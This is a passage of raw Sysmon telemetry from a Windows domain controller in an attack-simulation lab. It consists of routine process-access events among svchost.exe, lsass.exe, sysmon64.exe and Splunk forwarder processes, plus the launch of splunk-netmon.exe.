13:15:16.523{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.523{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.523{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E4-6000-0601-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-43E4-6000-0601-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E4-6000-0601-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.429{08A6967A-43E4-6000-0601-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt